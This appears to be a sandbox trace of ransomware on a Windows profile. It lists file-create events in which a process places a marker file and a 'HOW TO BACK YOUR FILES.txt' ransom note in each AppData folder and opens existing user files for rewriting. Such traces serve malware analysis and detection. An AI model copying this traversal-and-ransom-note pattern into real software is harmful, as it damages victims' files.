Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\NativeCache\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\NativeCache\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\G7ZD37Y5\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\G7ZD37Y5\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Forms\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Forms\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Collab\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Collab\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\deployment.properties desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\tmp\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\tmp\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\tmp\si\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\tmp\si\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\security\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\security\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\log\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\log\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Mozilla\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Mozilla\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\Internet Explorer\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\Internet Explorer\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\Internet Explorer\Services\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\Internet Explorer\Services\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\nl_NL\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\nl_NL\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\en_US\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\en_US\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\en_GB\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\en_GB\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\en_CA\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\en_CA\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\de_DE\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Adobe\Linguistics\UserDictionaries\Adobe Custom Dictionary\de_DE\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
